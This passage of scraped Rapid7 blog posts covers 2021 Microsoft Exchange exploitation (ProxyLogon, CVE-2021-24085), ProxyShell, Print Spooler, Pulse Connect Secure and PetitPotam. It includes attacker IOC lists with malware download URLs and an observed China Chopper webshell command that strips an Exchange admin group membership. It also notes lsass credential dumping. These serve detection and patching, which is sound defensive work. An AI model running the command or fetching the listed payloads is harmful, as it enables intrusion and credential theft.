\nFQDN | estonine.com \nFQDN | p.estonine.com \nFQDN | ipinfo.io \nFilepath | C:\\inetpub\\wwwroot\\aspnet_client\\ \nFilepath | C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\ \nFilepath | C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Bin\\ \nFilepath | c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\\ \nFilepath | C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \nFilepath | C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\\ \nFilepath | C:\\Programdata\\ \nFilepath | C:\\ProgramData\\COM\\zfwqn\\ \nFilepath | C:\\root\\ \nFilepath | C:\\Users\\Public\\ \nFilepath | C:\\Users\\Public\\Opera\\ \nFilepath | C:\\Windows\\temp\\ \nFilename | 1.txt \nFilename | 2.bat \nFilename | 3.avi \nFilename | b.log \nFilename | c103w-at.zip \nFilename | client32.exe \nFilename | code \nFilename | curl.exe \nFilename | demo.dll \nFilename | discover.aspx \nFilename | dsf.exe \nFilename | error.aspx \nFilename | ErrorFF.aspx \nFilename | exshell.psc1 \nFilename | Flogon.aspx \nFilename | lsass.dump \nFilename | m103w.zip \nFilename | nvidia.msi \nFilename | opera_browser.dll \nFilename | opera_browser.exe \nFilename | opera_browser.png \nFilename | OutlookEN.aspx \nFilename | MonitoringLog.cmd \nFilename | MonitoringLog.exe \nFilename | p \nFilename | procdump64.exe \nFilename | Service.Information.rtf \nFilename | TimeoutLogout.aspx \nFilename | 2.bat \nFilename | script1.ps1 \nFilename | test.bat \nIP Address | 178.162.217.107 \nIP Address | 178.162.203.202 \nIP Address | 178.162.203.226 \nIP Address | 85.17.31.122 \nIP Address | 5.79.71.205 \nIP Address | 5.79.71.225 \nIP Address | 178.162.203.211 \nIP Address | 85.17.31.82 \nIP Address | 86.105.18.116 \nIP Address | 198.98.61.152 \nIP Address | 89.34.111.11 \nMD5 | 7a6c605af4b85954f62f35d648d532bf \nMD5 | e1ae154461096adb5ec602faad42b72e \nMD5 | b3df7f5a9e36f01d0eb0043b698a6c06 \nMD5 | c60ac6a6e6e582ab0ecb1fdbd607705b \nMD5 | 42badc1d2f03a8b1e4875740d3d49336 \nMD5 | c515107d75563890020e915f54f3e036 \nSHA1 | 02886f9daa13f7d9855855048c54f1d6b1231b0a \nSHA1 | c7f68a184df65e72c59403fb135924334f8c0ebd \nSHA1 | ab32d4ec424b7cd30c7ace1dad859df1a65aa50e \nSHA1 | ba9de479beb82fd97bbdfbc04ef22e08224724ba \nSHA1 | cee178da1fb05f99af7a3547093122893bd1eb46 \nSHA1 | 2fed891610b9a770e396ced4ef3b0b6c55177305 \nSHA-256 | b212655aeb4700f247070ba5ca6d9c742793f108881d07e4d1cdc4ede175fcff \nSHA-256 | d740136b37f894d76a7d4dedbe1ae51ed680c964bcb61e7c4ffe7d0e8b20ea09 \nSHA-256 | bd79027605c0856e7252ed84f1b4f934863b400081c449f9711446ed0bb969e6 \nSHA-256 | 4d24b359176389301c14a92607b5c26b8490c41e7e3a2abbc87510d1376f4a87 \nSHA-256 | c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf \nSHA-256 | 076d3ec587fc14d1ff76d4ca792274d1e684e0f09018b33da04fb1d5947a7d26 \nURL | `http://103.212.223.210:9900/nvidia.msi` \nURL | `http://86.105.18.116/news/code` \nURL | `http://86.105.18.116/news/opera_browser.dll` \nURL | `http://86.105.18.116/news/opera_browser.exe` \nURL | `http://86.105.18.116/news/opera_browser.png` \nURL | ` http://89.34.111.11/3.avi` \nURL | `http://microsoftsoftwaredownload.com:8080/c103w-at.zip` \nURL | `http://microsoftsoftwaredownload.com:8080/m103w.zip` \nURL | `http://p.estonine.com/p?e` \nURL | http://<REDACTED_HOSTNAME>/owa/auth/ /zfwqn \nURL | http://<REDACTED_HOSTNAME>/owa/auth/%20/zfwqn \n \n### References:\n\n * <https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>\n * <https://aka.ms/ExchangeVulns>\n * <https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>\n * <https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html>\n * <https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html>\n * <https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-03-23T14:04:36", "type": "rapid7blog", "title": "Defending Against the Zero Day: Analyzing Attacker Behavior Post-Exploitation of Microsoft Exchange", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-18913", "CVE-2019-19781", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-23T14:04:36", "id": "RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "href": "https://blog.rapid7.com/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-18T14:50:05", "description": "\n\nOn March 2, 2021, the Microsoft Threat Intelligence Center (MSTIC) [released details on an active state-sponsored threat campaign](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) exploiting four zero-day vulnerabilities in on-premises instances of Microsoft Exchange Server. MSTIC attributes this campaign to HAFNIUM, a group \u201cassessed to be state-sponsored and operating out of China.\u201d\n\nRapid7 detection and response teams [have also observed increased threat activity](<https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/>) against Microsoft Exchange Server since Feb. 27, 2021, and can confirm ongoing mass exploitation of vulnerable Exchange instances. Microsoft Exchange customers **should apply the latest updates on an emergency basis** and take immediate steps to harden their Exchange instances. We strongly recommend that organizations monitor closely for suspicious activity and indicators of compromise (IOCs) stemming from this campaign. Rapid7 has a comprehensive list of [IOCs available here](<https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/>).\n\nThe actively exploited zero-day vulnerabilities disclosed in the MSTIC announcement as part of the HAFNIUM-attributed threat campaign are:\n\n * **[CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>)**, also known as [Proxylogon](<https://proxylogon.com/>), is a server-side request forgery (SSRF) vulnerability in Exchange that allows an attacker to send arbitrary HTTP requests and authenticate as the Exchange server. According to Orange Tsai, the researcher who discovered the vulnerabilities, CVE-2021-26855 allows code execution when chained with CVE-2021-27065 (see below). A successful exploit chain would allow an unauthenticated attacker to "execute arbitrary commands on Microsoft Exchange Server through only an open 443 port." More information and a disclosure timeline are available at <https://proxylogon.com>.\n * **[CVE-2021-27065](<https://attackerkb.com/topics/lLMDUaeKSn/cve-2021-27065?referrer=blog>)** is a post-authentication arbitrary file write vulnerability in Exchange. An attacker who can authenticate with the Exchange server can use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n * **[CVE-2021-26857](<https://attackerkb.com/topics/hx6O9H590s/cve-2021-26857?referrer=blog>)** is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gives an attacker the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.\n * **[CVE-2021-26858](<https://attackerkb.com/topics/TFFtD6XA8z/cve-2021-26858?referrer=blog>)** is a post-authentication arbitrary file write vulnerability in Exchange. If an attacker could authenticate with the Exchange server, they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\nAlso included in the out-of-band update were three additional remote code execution vulnerabilities in Microsoft Exchange. These additional vulnerabilities are not known to be part of the HAFNIUM-attributed threat campaign but should be remediated with the same urgency nonetheless:\n\n * **[CVE-2021-26412](<https://attackerkb.com/topics/mgKIUMCadN/cve-2021-27078?referrer=blog>)** (CVSS:3.0 9.1 / 8.2)\n * **[CVE-2021-26854](<https://attackerkb.com/topics/KxXhEt74SK/cve-2021-26412?referrer=blog>)** (CVSS:3.0 6.6 / 5.8)\n * **[CVE-2021-27078](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>)** (CVSS:3.0 9.1 / 8.2)\n\nMicrosoft has released out-of-band patches for all seven vulnerabilities as of March 2, 2021. Security updates are available for the following specific versions of Exchange:\n\n * Exchange Server 2010 (for Service Pack 3\u2014this is a Defense in Depth update)\n * Exchange Server 2013 (CU 23)\n * Exchange Server 2016 (CU 19, CU 18)\n * Exchange Server 2019 (CU 8, CU 7)\n\nExchange Online is not affected.\n\n## For Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to these vulnerabilities with authenticated vulnerability checks. Customers will need to perform a console restart after consuming the content update in order to scan for these vulnerabilities.\n\nInsightIDR will generate an alert if suspicious activity is detected in your environment. The Insight Agent must be installed on Exchange Servers to detect the attacker behaviors observed as part of this attack. If you have not already done so, [install the Insight Agent](<https://docs.rapid7.com/insight-agent/install/>) on your Exchange Servers.\n\nFor individual vulnerability analysis, [see AttackerKB](<https://attackerkb.com/topics/Sw8H0fbJ9O/multiple-microsoft-exchange-zero-day-vulnerabilities---hafnium-campaign?referrer=blog#rapid7-analysis>).\n\n## Updates\n\n**Update March 18, 2021:** Microsoft has released a "One-Click Exchange On-premises Mitigation Tool" (EOMT.ps1) that may be able to automate portions of both the detection and patching process. Microsoft has said the tool is intended "to help customers who do not have dedicated security or IT teams to apply these security updates...This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update." They have tested the tool across Exchange Server 2013, 2016, and 2019 deployments. See Microsoft's blog on the tool for details and directions: <https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>\n\nWe continue to encourage on-premises Exchange Server users to prioritize patching and monitoring for indicators of compromise on an emergency basis.\n\n**Update March 15, 2021:** There are now multiple reports of [ransomware](<https://twitter.com/phillip_misner/status/1370197696280027136>) being used after initial compromise of unpatched Exchange servers. Microsoft [has confirmed](<https://twitter.com/MsftSecIntel/status/1370236539427459076>) that it is detecting and blocking a new ransomware strain it calls DearCry. On-premises Exchange customers should continue to prioritize patching and monitoring for indicators of compromise on an emergency basis.\n\n**Update March 7, 2021:** Widespread [exploitation and compromise](<https://twitter.com/GossiTheDog/status/1366894548593573893>) of Exchange servers is ongoing. CISA, the U.S. Cybersecurity and Infrastructure Agency, [said on March 6, 2021](<https://us-cert.cisa.gov/ncas/current-activity/2021/03/06/microsoft-ioc-detection-tool-exchange-server-vulnerabilities>) that they are "aware of widespread domestic and international exploitation of these vulnerabilities." Microsoft has [published a script](<https://github.com/microsoft/CSS-Exchange/blob/cb550e399bc2785e958472e533147826e2b6bf24/Security/Test-ProxyLogon.ps1>) to help identify some vulnerable versions of Exchange. Because there is [some potential for false negatives](<https://github.com/microsoft/CSS-Exchange/issues/107>), we recommend using this script as a supporting tool rather than as a primary way of confirming vulnerability. Defenders should check the version of Exchange they're running and compare against the known vulnerable versions Microsoft has identified. (Those running older, unsupported versions of Exchange should consider updating as a best practice.)\n\nOn-premises Exchange administrators should continue to treat this widespread threat as an incident response scenario and examine their environments for signs of compromise. Rapid7 has [a list of IOCs here](<https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/>), which we will continue to update as new information becomes available. Microsoft has also released [an updated script](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) that scans Exchange log files for IOCs associated with the vulnerabilities disclosed on March 2, 2021.", "cvss3": {}, "published": "2021-03-03T19:23:42", "type": "rapid7blog", "title": "Mass Exploitation of Exchange Server Zero-Day CVEs: What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-03T19:23:42", "id": "RAPID7BLOG:6C0062981975551A3565CCAD248A1573", "href": "https://blog.rapid7.com/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-02T21:07:58", "description": "\n\n_The following blog post was co-authored by Andrew Christian and Brendan Watters._\n\nBeginning Feb. 27, 2021, [Rapid7\u2019s Managed Detection and Response (MDR)](<https://www.rapid7.com/services/managed-services/managed-detection-and-response-services/>) team has observed a notable increase in the automated exploitation of vulnerable Microsoft Exchange servers to upload a webshell granting attackers remote access. The suspected vulnerability being exploited is a [cross-site request forgery (CSRF) vulnerability](<https://www.rapid7.com/fundamentals/cross-site-request-forgery/>): The likeliest culprit is [CVE-2021-24085](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-24085>), an Exchange Server spoofing vulnerability released as part of Microsoft\u2019s February 2021 Patch Tuesday advisory, though other CVEs may also be at play (e.g., CVE-2021-26855, CVE-2021-26865, CVE-2021-26857).\n\nThe following China Chopper command was observed multiple times beginning Feb. 27 using the same DigitalOcean source IP (165.232.154.116):\n \n \n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&net group \"Exchange Organization administrators\" administrator /del /domain&echo [S]&cd&echo [E]\n \n\nExchange or other systems administrators who see this command\u2014or any other China Chopper command in the near future\u2014should look for the following in IIS logs:\n\n * 165.232.154.116 (the source IP of the requests)\n * `/ecp/y.js`\n * `/ecp/DDI/DDIService.svc/GetList`\n\nIndicators of compromise (IOCs) from the attacks we have observed are consistent with IOCs for [publicly available exploit code targeting CVE-2021-24085](<https://github.com/sourceincite/CVE-2021-24085>) released by security researcher [Steven Seeley](<https://twitter.com/steventseeley>) last week, shortly before indiscriminate exploitation began. After initial exploitation, attackers drop an ASP eval webshell before (usually) executing `procdump` against `lsass.exe` in order to grab all the credentials from the box. It would also be possible to then clean some indicators of compromise from the affected machine[s]. We have included a section on CVE-2021-24085 exploitation at the end of this document.\n\nExchange servers are frequent, [high-value attack targets](<https://attackerkb.com/search?q=exchange>) whose patch rates often [lag behind attacker capabilities](<https://blog.rapid7.com/2020/09/29/microsoft-exchange-2010-end-of-support-and-overall-patching-study/>). Rapid7 Labs has identified nearly 170,000 Exchange servers vulnerable to CVE-2021-24085 on the public internet:\n\n\n\n**Rapid7 recommends that Exchange customers apply Microsoft\u2019s February 2021 updates immediately.** InsightVM and Nexpose customers can [assess their exposure to CVE-2021-24085](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-24085/>) and other February Patch Tuesday CVEs with vulnerability checks. InsightIDR provides existing coverage for this vulnerability via our out-of-the-box China Chopper Webshell Executing Commands detection, and will alert you about any suspicious activity. [View this detection](<https://docs.rapid7.com/insightidr/windows-suspicious-process/#attacker-tool>) in the Attacker Tool section of the InsightIDR Detection Library.\n\n## CVE-2021-24085 exploit chain\n\nAs part of the [PoC](<https://github.com/sourceincite/CVE-2021-24085>) for CVE-2021-24085, the attacker will search for a specific token using a request to `/ecp/DDI/DDIService.svc/GetList`. If that request is successful, the PoC moves on to writing the desired token to the server\u2019s filesystem with the request `/ecp/DDI/DDIService.svc/SetObject`. At that point, the token is available for downloading directly. The PoC uses a download request to `/ecp/poc.png` (though the name could be anything) and may be recorded in the IIS logs themselves attached to the IP of the initial attack.\n\nIndicators of compromise would include the requests to both `/ecp/DDI/DDIService.svc/GetList` and `/ecp/DDI/DDIService.svc/SetObject`, especially if those requests were associated with an odd user agent string like `python`. Because the PoC utilizes aSetObject to write the token o the server\u2019s filesystem in a world-readable location, it would be beneficial for incident responders to examine any files that were created around the time of the requests, as one of those files could be the access token and should be removed or placed in a secure location. It is also possible that responders could discover the file name in question by checking to see if the original attacker\u2019s IP downloaded any files.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-03-02T19:53:28", "type": "rapid7blog", "title": "Indiscriminate Exploitation of Microsoft Exchange Servers (CVE-2021-24085)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-24085", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26865"], "modified": "2021-03-02T19:53:28", "id": "RAPID7BLOG:F216985E1720C28CCE9E1F41AD704502", "href": "https://blog.rapid7.com/2021/03/02/indiscriminate-exploitation-of-microsoft-exchange-servers-cve-2021-24085/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-08-25T01:34:04", "description": "\n\n_See the `Updates` section at the end of this post for new information as it comes to light._\n\nWhether you attended virtually, IRL, or not at all, Black Hat and DEF CON have officially wrapped, and security folks\u2019 brains are replete with fresh information on new (and some not-so-new) vulnerabilities and exploit chains. The \u201chacker summer camp\u201d conferences frequently also highlight attack surface area that may _not_ be net-new \u2014 but that is subjected to renewed and redoubled community interest coming out of Vegas week. See Rapid7\u2019s summaries [here](<https://www.rapid7.com/blog/post/2021/08/05/black-hat-recap-1/>) and [here](<https://www.rapid7.com/blog/post/2021/08/06/black-hat-recap-2/>).\n\nHere\u2019s the specific attack surface area and a few of the exploit chains we\u2019re keeping our eye on right now:\n\n * Orange Tsai stole the show (as always) at Black Hat with a talk on fresh **Microsoft Exchange** attack surface area. All in all, Orange discussed CVEs from [what appears to be four separate attack chains](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>) \u2014including the ProxyLogon exploit chain that made headlines when it hit exposed Exchange servers as a zero-day attack [back in March](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) and the \u201cProxyShell\u201d exploit chain, which debuted at Pwn2Own and targets three now-patched CVEs in Exchange. Exchange continues to be a critically important attack surface area, and defenders should keep patched on a top-priority or zero-day basis wherever possible.\n * Print spooler vulnerabilities continue to cause nightmares. DEF CON saw the release of new privilege escalation exploits for Windows Print Spooler, and Black Hat featured a talk by Sangfor Technologies researchers that chronicled both [new Windows Print Spooler vulnerabilities](<https://attackerkb.com/assessments/85a30c9a-e126-4ec0-bda4-d166e03c5390>) and past patch bypasses for vulns like CVE-2020-1048 (whose patch was bypassed three times). Given that many defenders are still trying to remediate the \u201cPrintNightmare\u201d vulnerability from several weeks ago, it\u2019s fair to say that Windows Print Spooler will remain an important attack surface area to prioritize in future Patch Tuesdays.\n * There\u2019s also a new vulnerability in Pulse Connect Secure VPNs that caught our attention \u2014 the vuln is actually a bypass for CVE-2020-8260, which came out last fall and evidently didn\u2019t completely fade away \u2014 despite the fact that it\u2019s authenticated and requires admin access. With CISA\u2019s warnings about APT attacks against Pulse Connect Secure devices, it\u2019s probably wise to patch CVE-2021-22937 quickly.\n * And finally, the SpecterOps crew gave a highly anticipated Black Hat talk on several new attack techniques that [abuse Active Directory Certificate Services](<https://posts.specterops.io/certified-pre-owned-d95910965cd2>) \u2014 something we covered previously in our summary of the [PetitPotam attack chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>). This is neat research for red teams, and it may well show up on blue teams\u2019 pentest reports.\n\n### Microsoft Exchange ProxyShell chain\n\n**Patches:** Available \n**Threat status:** Possible threat (at least one report of exploitation in the wild)\n\nIt goes without saying that Microsoft Exchange is a high-value, popular attack surface that gets constant attention from threat actors and researchers alike. That attention is increasing yet again after prominent security researcher Orange Tsai gave a talk at Black Hat USA last week revealing details on an attack chain first demonstrated at Pwn2Own. The chain, dubbed \u201cProxyShell,\u201d allows an attacker to take over an unpatched Exchange server. ProxyShell is similar to ProxyLogon (i.e., [CVE-2021-26855](<https://attackerkb.com/assessments/a5c77ede-3824-4176-a955-d6cf9a6a7417>) and [CVE-2021-27065](<https://attackerkb.com/assessments/74177979-e2ef-4078-9f91-993964292cfa>)), which continues to be popular in targeted attacks and opportunistic scans despite the fact that it was patched in March 2021.\n\nTwo of the three vulnerabilities used for ProxyShell were patched in April by Microsoft and the third was patched in July. As of August 9, 2021, private exploits have already been developed, and it\u2019s probably only a matter of time before public exploit code is released, which may allow for broader exploitation of the vulns in this attack chain (in spite of its complexity!). Rapid7 estimates that there are, at least, nearly 75,000 ProxyShell-vulnerable exchange servers online:\n\n\n\nWe strongly recommend that Exchange admins confirm that updates have been applied appropriately; if you haven\u2019t patched yet, you should do so immediately on an emergency basis.\n\nOne gotcha when it comes to Exchange administration is that Microsoft only releases security fixes for the [most recent Cumulative Update versions](<https://docs.microsoft.com/en-us/exchange/new-features/updates>), so it\u2019s vital to stay up to date with these quarterly releases in order to react quickly when new patches are published.\n\nProxyShell CVEs:\n\n * [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)\n * [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)\n * [CVE-2021-34523\u200b](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)\n\n### Windows Print Spooler \u2014 and more printer woes\n\n**Patches:** Varies by CVE, mostly available \n**Threat status:** Varies by CVE, active and impending\n\nThe Windows Print Spooler was the subject of renewed attention after the premature disclosure of the PrintNightmare vulnerability earlier this summer, followed by new Black Hat and DEF CON talks last week. Among the CVEs discussed were a quartet of 2020 vulns (three of which were bypasses descended from CVE-2020-1048, which has been exploited in the wild since last year), three new remote code execution vulnerabilities arising from memory corruption flaws, and two new local privilege escalation vulnerabilities highlighted by researcher [Jacob Baines](<https://twitter.com/Junior_Baines>). Of this last group, one vulnerability \u2014 CVE-2021-38085 \u2014 remains unpatched.\n\nOn August 11, 2021, Microsoft assigned [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) to the latest Print Spooler remote code execution vulnerability which appears to require local system access and user interaction. Further details are limited at this time. However, as mitigation, Microsoft is continuing to recommend stopping and disabling the Print Spooler service. Even after this latest zero-day vulnerability is patched, we strongly recommend leaving the Print Spooler service disabled wherever possible. Read Rapid7\u2019s [blog on PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) for further details and updates.\n\nWindows Print Spooler and related CVEs:\n\n * [CVE-2020-1048](<https://attackerkb.com/topics/QoQvwrIqEV/cve-2020-1048-windows-print-spooler-elevation-of-privilege-vulnerability?referrer=blog>) (elevation of privilege vuln in Windows Print Spooler presented at Black Hat 2020; exploited in the wild, Metasploit module available)\n * [CVE-2020-1337](<https://attackerkb.com/topics/mEEwlfrTK3/cve-2020-1337?referrer=blog>) (patch bypass for CVE-2020-1048; Metasploit module available)\n * [CVE-2020-17001](<https://attackerkb.com/topics/oGAzAwKy1N/cve-2020-17001?referrer=blog>) (patch bypass variant for CVE-2020-1048)\n * [CVE-2020-17014](<https://attackerkb.com/topics/N9XhrkViyk/cve-2020-17014?referrer=blog>) (patch bypass variant for CVE-2020-1048)\n * [CVE-2020-1300](<https://attackerkb.com/topics/43jdEqsVY1/cve-2020-1300?referrer=blog>) (local privilege escalation technique known as \u201c[EvilPrinter](<https://twitter.com/R3dF09/status/1271485928989528064>)\u201d presented at DEF CON 2020)\n * [CVE-2021-24088](<https://attackerkb.com/assessments/85a30c9a-e126-4ec0-bda4-d166e03c5390>) (new remote code execution vulnerability in the Windows local spooler, as presented at Black Hat 2021)\n * [CVE-2021-24077](<https://attackerkb.com/topics/wiyGYban1l/cve-2021-24077?referrer=blog>) (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)\n * [CVE-2021-1722](<https://attackerkb.com/topics/v1Qm7veSwf/cve-2021-1722?referrer=blog>) (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)\n * [CVE-2021-1675](<https://attackerkb.com/topics/dI1bxlM0ay/cve-2021-1675?referrer=blog>) (elevation of privilege vuln in Windows Print Spooler patched in June 2021)\n * [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>), aka \u201cPrintNightmare\u201d\n * [CVE-2021-35449](<https://attackerkb.com/topics/9sV2bS0OSj/cve-2021-35449?referrer=blog>) (print driver local privilege escalation vulnerability, as [presented](<https://www.youtube.com/watch?v=vdesswZYz-8>) at DEF CON 2021; Metasploit module in progress)\n * [CVE-2021-38085](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38085>) (**unpatched** print driver local privilege escalation vulnerability, as [presented](<https://www.youtube.com/watch?v=vdesswZYz-8>) at DEF CON 2021; Metasploit module in progress)\n * [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) (**unpatched** remote code execution vulnerability; announced August 11, 2021)\n\nCurrently, both [PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) CVE-2021-34527 and CVE-2020-1048 are known to be exploited in the wild. As the list above demonstrates, patching print spooler and related vulns quickly and completely has been a challenge for Microsoft for the past year or so. The multi-step mitigations required for some vulnerabilities also give attackers an advantage. Defenders should harden printer setups wherever possible, including against malicious driver installation.\n\n### Pulse Connect Secure CVE-2021-22937\n\n**Patch:** Available \n**Threat status:** Impending (Exploitation expected soon)\n\nOn Monday, August 2, 2021, Ivanti published [Security Advisory SA44858](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44858>) which, among other fixes, includes a fix for CVE-2021-22937 for Pulse Connect Secure VPN Appliances running 9.1R11 or prior. Successful exploitation of this vulnerability, which carries a CVSSv3 score of 9.1, requires the use of an authenticated administrator account to achieve remote code execution (RCE) as user `root`.\n\nPublic proof-of-concept (PoC) exploit code has not been released as of this writing. However, this vulnerability is simply a workaround for [CVE-2020-8260](<https://blog.rapid7.com/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/%E2%80%8B%E2%80%8Bhttps://attackerkb.com/topics/MToDzANCY4/cve-2020-8260?referrer=search#vuln-details>), an authentication bypass vulnerability that was heavily utilized by attackers, released in October 2020.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has been monitoring the [Exploitation of Pulse Connect Secure Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) demonstrating that attackers have been targeting Ivanti Pulse Connect Secure products for over a year. Due to attacker focus on Pulse Connect Secure products, and especially last year\u2019s CVE-2020-8260, Rapid7 recommends patching CVE-2021-22937 as soon as possible.\n\n### PetitPotam: Windows domain compromise\n\n**Patches:** Available \n**Threat status:** Threat (Exploited in the wild)\n\nIn July 2021, security researcher [Topotam](<https://github.com/topotam>) published a [PoC implementation](<https://github.com/topotam/PetitPotam>) of a novel NTLM relay attack christened \u201cPetitPotam.\u201d The technique used in the PoC allows a remote, unauthenticated attacker to completely take over a Windows domain with the Active Directory Certificate Service (AD CS) running \u2014 including domain controllers. Rapid7 researchers have tested public PoC code against a Windows domain controller setup and confirmed exploitability. One of our [senior researchers](<https://twitter.com/wvuuuuuuuuuuuuu>) summed it up with: "This attack is too easy." You can read Rapid7\u2019s full blog post [here](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>).\n\nOn August 10, 2021, Microsoft released a patch that addresses the PetitPotam NTLM relay attack vector in today's Patch Tuesday. Tracked as [CVE-2021-36942](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942>), the August 2021 Patch Tuesday security update blocks the affected API calls [OpenEncryptedFileRawA](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>) and [OpenEncryptedFileRawW](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfileraww>) through the LSARPC interface. Windows administrators should prioritize patching domain controllers and will still need to take additional steps listed in [KB5005413](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>) to ensure their systems are fully mitigated.\n\n### Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to the vulnerabilities in this post with authenticated vulnerability checks. Please note that details haven\u2019t yet been released on CVE-2021-38085 and CVE-2021-36958; therefore, it\u2019s still awaiting analysis and check development.\n\n### Updates\n\n**Pulse Connect Secure CVE-2021-22937** \nOn August 24, 2021, the Cybersecurity & Infrastructure Security Agency (CISA) released [Malware Analysis Report (AR21-236E)](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236e>) which includes indicators of compromise (IOCs) to assist with Pulse Connect Secure investigations.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T17:13:25", "type": "rapid7blog", "title": "Popular Attack Surfaces, August 2021: What You Need to Know", "bulletinFamily": "info", "cvss2": 